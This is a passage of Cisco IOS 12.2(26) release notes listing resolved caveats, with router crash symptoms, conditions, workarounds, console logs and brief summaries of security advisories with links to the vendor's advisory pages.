Workaround: Reload CEF on the VIP or LC by entering the clear cef linecard slot-number EXEC command.
Alternate Workaround: Restart the VIP by performing an online insertion and removal (OIR). Restart the LC by executing the hw-module slot slot # reload command.
•
Symptoms: CPUHOG and Switch1 bad VCD error with traceback is observed on a router configured as a PE router.
May 5 16:50:22.637: %SYS-3-CPUHOG: Task ran for 2816 msec (348/345), process = Virtual Exec, PC = 600EEA30. -Traceback= 600EEA38 600776C0 60078564 603146F0 602DD204 602DD2BC 602C9FCC 602DCD48 60353F0C 60353EF0
May 5 16:50:32.441: %ATMPA-3-BADVCD: Switch1 bad vcd 3137 packet - 0C418847 00052C3B 00B3DD3B 456B012C 00000000 3B008B0E
Conditions: Upon execution of the clear interface sw1 command, %ATMPA-3-BADVCD Switch1 BADVCD with traceback error is observed. The setup has approximately 800 LVCs and 1000 PVCs. This issue is reproducible on platforms which exceed a CPU cycle of more than 2 seconds for 100 VCs.
Workaround: There is no workaround.
•
Symptoms: A Cisco platform that accesses the "system:/vfiles/tmstats_ascii" virtual file (for example, via "more system:/vfiles/tmstats_ascii") may crash because of bus error.
Conditions: This symptom is observed under normal working conditions when no configuration changes are made on a Cisco platform that runs Cisco IOS Release 12.0 S, 12.1 E, 12.2 or 12.3. When the "system:/vfiles/tmstats_ascii" virtual file is not used, the symptom does not occur.
Workaround: There is no workaround.
•
Symptoms: A Cisco 3600 series with an NM-CT1/E1 network module that contains an NM-xDM network module may not allow incoming modem calls and generate the "no modem available" error message even though the output of the show modem command indicates that there is a free modem available.
Conditions: This symptom is observed when frequent retrains occur on the modems.
Workaround: There is no workaround.
•
Symptom: The PE router configured with MPLS may reload due to freed mpls adjacency while doing label imposition on the received IP packets.
Conditions: The condition is label imposition to the received packets on the PE router configured with MPLS.
Workaround: There is no workaround.
•
Symptoms: On a Cisco 7500 series, all PVCs may suddenly enter the down state and remain in this state for about two minutes before they come back up. During the DLCI down state, the subinterface does not go down and no notifications are observed in the message log.
Conditions: This symptom is observed on a Cisco 7500 series that is configured with an RPS4+ or an RSP8 and that runs the rsp-jsv-mz image of Cisco IOS Release 12.2(12i). In addition, the router is configured with an 8-port serial port adapter and an HSSI port adapter, is configured for Frame Relay, and has more than 450 PVCs/DLCIs. Note that the symptom may be platform-independent and may also occur on other Cisco platforms in a similar configuration.
Workaround: There is no workaround.
•
Symptoms: When you enter the format flash: command on a router to format a LEFS flash card, the router fails to give the DOS format and displays this error:
%Error formatting flash (Invalid DOS media or no media in slot)
The flash card is no longer accessible until the router is reloaded.
Conditions: This symptom is observed on any Cisco router that supports a disk file system and that runs Cisco IOS Release 12.3(6) or a later release. The symptom may also occur in other releases.
Workaround: There is no workaround.
•
Symptoms: A Cisco 3700 series with an NM-1A-OC3, NM-1A-T3, or NM-1A-E3 network module with many VCs of the same class may reload because of a bus error.
Conditions: This symptom is observed when you configure more than 255 VCs of the same QoS type on the ATM interface, when traffic is processed on all VCs, and when a line error occurs.
Workaround: There is no workaround.
•
Symptoms: After running traffic for 24 to 36 hours on an ATM subinterface, tracebacks occur, and the ATM interface and all ATM subinterfaces on the same network module stop sending traffic although the ATM interface is still in the "up/up" state. A ping fails on the interface and the EIGRP neighbor may also be lost. OAM functionality is not affected.
The ATM SAR reports many CRC errors, length violations, and timeout errors. The framer does not report any physical level problems.
Conditions: These symptoms are observed on a Cisco 2600 series that is configured with an ATM network module after running traffic for 24 to 36 hours on the ATM subinterface.
Temporary Workaround: Reset the router until the symptoms occur again after 24 to 36 hours.
•
Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address and generate the following error message:
System was restarted by bus error at by bus error at PC 0x60C7D834, address 0xD0D0D23
Conditions: This symptom is observed on a Cisco voice gateway that runs Cisco IOS Release 12.2(23b) and that is configured for H.323. The symptom may also occur in Release 12.3.
Workaround: There is no workaround.
•
Symptoms: A router running Cisco IOS Release 12.2(13b)M2 may crash with a Bus Error exception.
Conditions: This symptom is observed on routers running Cisco IOS Release 12.2 (13b)M2.
Workaround: Problem seems to be in the process switching path, so enabling the ip route cache command on all interfaces should help.
•
Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address:
System was restarted by bus error at PC 0x60C5BD30, address 0xD391832C
Conditions: This symptom is observed on a Cisco voice gateway that is running Cisco IOS Release 12.2(23b) and H.323.
Workaround: There is no workaround.
•
Symptoms: On an RTR probe, an RSP does not report input or output packets for serial interfaces of PA-MC-8T1, PA-MC-8E1, and PA-MC-8TE1+ port adapters.
Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.2(23a) or Release 12.3 and is more likely to occur when the number of channelized port adapters (such as the PA-MC-8T1, PA-MC-8E1, and PA-MC-8TE1+ port adapters) that are installed in the router is high. The symptom may also occur in other releases.
Workaround: Reload the router.
Alternate Workaround: Enter the reload microcode router configuration command.
•
Symptoms: An HPR/RTP connection, identified by a TCID, may perform very slowly because of an excessively large delay change sum (DCS) value.
Conditions: This symptom is observed when a Cisco platform that functions as an HPR endpoint performs a path switch in times of instability. The DCS of the router may become corrupted because of the incorrect calculation of the last received rate request.
Workaround: Initiate a manual path switch at the mainframe end to reset the connection and clear the condition. Otherwise, reset the TCID, or wait until the natural decay of the DCS returns it to zero.
•
Symptoms: IP SNMP CPU utilization increases to 99 percent when you query for SNASw and DLSw via the mib-2.34.4.1 OID. The CPU utilization of the router goes to 99 percent with about 75 percent in use by the SNASw process.
When you stop the snmpwalk, process, the CPU utilization of the router remains high, and SNASw functionality is affected. When you enter the snasw stop command followed by the snasw start command, SNASw functionality is restored but after you enter the snasw stop command, error messages similar to the following ones are generated:
%SNASW-3-MIBQueryFailure: Query Mode failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary
rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS TG Row failed. NOF primary rc=4F0Conditions: These symptoms are observed on a Cisco 7204VXR that runs Cisco IOS Release 12.3.(9) but could occur on any platform that is configured for SNASw.
Workaround: Stop all DLUR LU-LU sessions, or stop SNASwitch completely.
•
Symptom: An I/O memory leak occurs when BSTUN is configured; an interrupt without any data is received.
Conditions: This symptom is observed on a Cisco 2600 series that is configured with a WIC-2A/S.
Workaround: There is no workaround.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
Symptoms: A DLC trace shows that SNASw includes an illegal TG vector in a Topology Update flow to a DLUS host. The TG vector contains a TG that both originates and terminates at the local SNASw node. The host log may show this rejection with sense code 10010021.
Conditions: This symptom is observed when a DLUR-DLUS session is started with the host. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCdz25898. Cisco IOS software releases that are not listed in the "First Fixed-in Version" field at this location are not affected.
Workaround: There is no workaround. However, there is no harmful impact so the symptoms may be ignored.
•
Symptoms: A Snasw router may crash and reload.
Conditions: This symptom is observed when the Snasw router has enterprise extender connections configured to multiple upstream main frames and one of the main frames is IPLed.
Workaround: There is no workaround.
•
Symptoms: A Cisco 2651 router with a WIC-2T installed running Cisco IOS Release 12.2(26.8) will have a problem if trying to configure a serial interface for anything other than HDLC.
When configuring encapsulation frame-relay on a serial interface, the command appears to be accepted. However, the interface remains HDLC, as seen in show interface and show run commands, and does not reflect encapsulation frame-relay. When configuring bstun, the same situation arises. When configuring ppp, the interface changes encapsulation to ppp, but it cannot be changed back.
Conditions: This symptom was observed on a Cisco 2651 router with a WIC-2T installed running Cisco IOS Release 12.2(26.8). This symptom may occur on other platforms or interface types but definitely is seen on serial interfaces.
Workaround: There is no workaround.
•
Symptom: A Cisco 7xxx series may crash.
Conditions: This symptom is observed when the traffic rate via a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter is very high (at about or higher than the line rate).
Workaround: There is no workaround.
•
Symptoms: The Route Processor (RP) crashes when encapsulation is removed using the no encapsulation command.
Conditions: This symptom has been observed on a multilink interface with DLFI configuration under traffic.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7500 series router may reload when multilink interface configured on the router comes up.
Conditions: This symptom would happen if service-policy is configured on the multilink interface and distributed switching is enabled.
Workaround: Not configuring service-policy on the router would prevent the router from reloading.
•
Symptoms: After reload, the loss of permanent virtual circuit (PVC) configuration can happen on virtual circuits (VC) which are configured under the IMA-group interface of PA-A3-8T1IMA/PA-A3-8E1 IMA PA on Cisco 7xxx series routers.
Conditions: The problem happens on the IMA-group interface of PA-A3-8T1IMA/PA- A3-8E1 IMA PA on Cisco 7xxx series routers.
Workaround: Save the configuration to disk or in bootflash. After the reload and the router comes up, copy the configuration from the disk or bootflash to the running configuration.
•
Symptoms: If an online insertion and removal (OIR) occurs on the slot of a line card with interprocess communications (IPC) traffic running, the forwarding information base (FIB) on the other slots or on a secondary route processor (RP) may be disabled.
The following error messages are logged on the router:
%OIR-6-REMCARD: Card removed from slot 0, interfaces disabled
%HA-5-SYNC_NOTICE: OIR sync started.
%HA-5-SYNC_NOTICE: OIR sync completed.
%OIR-6-INSCARD: Card inserted in slot 0, interfaces administratively s hut down
%SYS-3-CPUHOG: Task is running for (2000)msecs, more than (2000)msecs
(1/1),process = OIR Handler.
-Traceback= 4043F544 404D667C 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (4000)msecs, more than (2000)msecs
(1/1),process = OIR Handler.
-Traceback= 404D6680 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (6000)msecs, more than (2000)msecs
(1/1),process = OIR Handler.
-Traceback= 4043F56C 404D667C 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (8000)msecs, more than (2000)msecs
(1/1),process = OIR Handler.
-Traceback= 404D6680 404D7698 404EEB94 404E01B4
%HA-5-SYNC_NOTICE: OIR sync started.
%FIB-3-FIBDISABLE: Fatal error, slot/cpu 2/0: IPC Failure: timeout <<<<<<<<<< !!!!
Conditions: This symptom is observed on a Cisco Route Switch Processor (RSP) router that is running Cisco IOS software.
Workaround: There is no workaround. The FIB may be reenabled by entering the no ip cef distributed global configuration command followed by the ip cef distributed global configuration command.
•
Symptoms: Multicast packets such as HSRP and OSPF are not received on a port-channel interface.
Conditions: This symptom is observed when a port-channel interface is configured on a Cisco router, when you reload the router, and when the first member is added to the port-channel interface by entering the no shutdown interface configuration command on physical interface.
Workaround: Enter the do shutdown interface configuration command followed by the no shutdown interface configuration command on the port-channel interface.
•
Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled and the following error message may appear on the console:
%FIB-3-NOMEM: Malloc Failure, disabling DCEF %FIB-2-FIBDOWN: CEF has been disabled due to a low memory condition. It can be re-enabled by configuring "ip cef [distributed]"
Conditions: This may be seen on a platform running DCEF. DCEF may get disabled. This depends on how much memory is being allocated at runtime.
Workaround: Upgrade to the image containing this bug-fix.
TCP/IP Host-Mode Services
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
Wide-Area Networking
•
Symptoms: A Cisco router may forward packets that come in on a subinterface that is in an administratively shut down state.
Conditions: This symptom is observed on a Cisco router that is configured with Frame Relay encapsulation.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(26c)
Cisco IOS Release 12.2(26c) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26c) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
•
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
•
Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.
Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.
The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestampMay 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy errorThe error message is then followed by a traceback.
It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.
Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml
IP Routing Protocols
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing.
This advisory is available at:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.
NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.
NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.
NHRP is not enabled by default for Cisco IOS.
This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.
Miscellaneous
•
The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.
Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.
Workaround: There is no workaround.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.
The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
•
Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.
Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.
Workaround: Disable the ip http secure server command.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
TCP/IP Host-Mode Services
•
The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.
This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers.
This issue is documented as Cisco bug ID CSCek37177
There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
•
Symptoms: A router that is running RCP can be reloaded by a specific packet.
Conditions: This symptom is seen under the following conditions:
–
–
–
Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.
Resolved Caveats—Cisco IOS Release 12.2(26b)
Cisco IOS Release 12.2(26b) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26b) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
IP Routing Protocols
•
Symptoms: A router may reset its Border Gateway Protocol (BGP) session.
Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.
Workaround: Configure the bgp maxas limit command in such as way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path value, the prefix is rejected and recorded the event in the log.
Miscellaneous
•
Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.
Cisco has made free software available that includes the additional integrity checks for affected customers.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.
Resolved Caveats—Cisco IOS Release 12.2(26a)
Cisco IOS Release 12.2(26a) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: A specifically crafted Transmission Control Protocol (TCP) connection to a telnet or reverse telnet port of a Cisco device running Internetwork Operating System (IOS) may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases Hypertext Transport Protocol (HTTP) access to the Cisco device. Telnet, reverse telnet, RSH and SSH sessions established prior to exploitation are not affected.
All other device services will operate normally.
Conditions: User initiated specially crafted TCP connection to a telnet or reverse telnet port results in blocking further telnet sessions. Whereas, services such as packet forwarding, routing protocols and all other communication to and through the device remains unaffected.
Workaround: The detail advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040827-telnet.shtml
IP Routing Protocols
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
Miscellaneous
•
Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled on a Versatile Interface Processor (VIP) or Cisco 12000 series line card (LC), and the following error message may appear on the console:
